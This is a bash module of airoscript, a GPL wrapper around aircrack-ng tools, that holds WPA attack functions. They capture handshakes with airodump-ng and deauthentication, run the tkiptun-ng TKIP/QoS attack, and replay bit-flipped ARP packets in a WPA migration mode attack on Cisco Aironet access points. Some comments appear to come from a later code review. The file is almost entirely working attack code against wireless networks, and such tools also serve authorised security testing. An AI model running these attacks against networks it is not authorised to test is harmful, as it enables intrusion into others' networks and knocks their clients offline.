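# Wpa attack functions for airoscript
# Copyright (C) 2011 David Francos Cuartero
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

# Warning! at least generic, internal and interface must be loaded before this one!
# $path comes from the caller's environment; quote it so a path with spaces
# still resolves to a single file.
check_function auth_attacks_fake || source "$path/attacks/auth" # It depends on auth module ;)
check_function wep_attacks || source "$path/attacks/wep"

# wpa_attacks ATTACK [ARGS...]
# Dispatcher for the WPA attacks below: cleans up, clears the screen and calls
# wpa_attacks_ATTACK with the remaining arguments, then stores the attack's
# notification in $notification.
# The attack name is only dispatched when a matching wpa_attacks_* function
# exists (checked with check_function, as the module loader above does), so a
# typo or an unexpected value cannot execute an arbitrary command name.
# Returns 1 on an unknown attack name, otherwise the attack's exit status is
# not propagated (matches the original, which ignored it).
wpa_attacks(){
    hardclean && $clear
    attack=$1; shift
    if check_function "wpa_attacks_$attack"; then
        "wpa_attacks_$attack" "$@"
    else
        echo "wpa_attacks: unknown attack '$attack'" >&2
        return 1
    fi
    notification=$attack_notification
}

# wpa_attacks_menu
# Shows the WPA help text, then loops on a menu until one attack is chosen
# (or the user returns). $choice is set by mkmenu; the screen is cleared
# after each selection before leaving the loop.
wpa_attacks_menu(){
    help_fifo $"${mark}${red}WPA attacks${end}\n"\
        "You're seeing this menu because the network you selected has WPA encryption\n"\
        "${red}Standard deauth attack${end}\n"\
        "Deauths a client, then waits for the client to reconnect and tries to capture the 4-way handshake\n"\
        "${red}QOS attack${end}\n"\
        "Launches tkiptun-ng to try to crack some vulnerable accesspoints to the wmm stuff\n"\
        "${red}WPA Migration Mode attack${end}\n"\
        "This attack targets on Cisco Aironet routers, wich set both WPA and WEP encriptions on the same sssid\nIt listens for a wep-encapsulated arp packet and retransmits it (bitflipped to make it into an ARP coming from the attacker's MAC)"
    while true; do
        $clear
        mkmenu $"Select WPA Attack" $"Standard attack" $"Standard attack with QoS (WMM)" $"WPA migration mode" $"Return to main menu"
        case $choice in
            1) wpa_attacks handshake; $clear; break;;
            2) wpa_attacks qos; $clear; break;;
            3) wpa_attacks wpamm; $clear; break;;
            4) $clear; break;;
        esac
    done
}

# wpa_attacks_wpamm
# WPA Migration Mode attack. Host_ENC is temporarily forced to "WEP" so the
# WEP module treats the target as a WEP network: the fake-auth WEP attack is
# started in the background while the injection menu (othersinjectmenu, with
# AUTO=2 and choice=3 preselected) runs in the foreground.
# The previous Host_ENC value is saved and restored unconditionally. The
# original only restored it when the trailing screen clear succeeded, which
# could leave the global stuck at "WEP" for later attacks.
wpa_attacks_wpamm(){
    local saved_enc=$Host_ENC
    Host_ENC="WEP"
    wep_attacks fakeauto &
    {
        AUTO=2
        choice=3
        othersinjectmenu
        AUTO=0
        $clear
    }
    $clear
    Host_ENC=$saved_enc
    $clear; echo; $clear
}

# wpa_attacks_handshake
# Standard 4-way handshake capture: optionally picks a client, captures on
# the target's channel with airodump-ng into $DUMP_PATH/$Host_MAC, then
# offers a deauth (choose_deauth 2 when a client MAC is known, 3 otherwise).
# $directed is a global; it is reset here on every run so a value left over
# from a previous attack cannot select the directed deauth when no client
# MAC is set this time.
# Arguments to airodump-ng are quoted; $AIRODUMP itself is left unquoted
# because it may legitimately carry extra flags (split on whitespace).
wpa_attacks_handshake(){
    [[ $dynamic_client_selection ]] && { auto_scan_clients; select_client; }
    directed=0
    [[ $Client_MAC != "" ]] && directed=1
    export time_=0
    execute $"Capturing data on channel: $Host_CHAN" $AIRODUMP --ignore-negative-one -w "$DUMP_PATH/$Host_MAC" --bssid "$Host_MAC" --channel "$Host_CHAN" -a "$wifi"
    export time_=1
    if [[ $directed == 1 ]]; then
        choose_deauth 2
    else
        choose_deauth 3
    fi
}

# wpa_attacks_qos
# TKIP/QoS (WMM) attack: sets the card to the target's channel and runs
# tkiptun-ng against $Host_MAC with $FAKE_MAC as the source, using the
# configured min/max payload lengths.
# NOTE(review): the channel is set on $wificard but tkiptun-ng is given
# $wifi (as the handshake attack does) — confirm both refer to the monitor
# interface.
wpa_attacks_qos(){
    iwconfig "$wificard" channel "$Host_CHAN" # Hope this is ok for all cards
    export time_=0
    execute $"Executing tkiptun-ng for ap $Host_MAC" $TKIPTUN -h "$FAKE_MAC" -a "$Host_MAC" -m "$TKIPTUN_MIN_PL" -n "$TKIPTUN_MAX_PL" "$wifi"
}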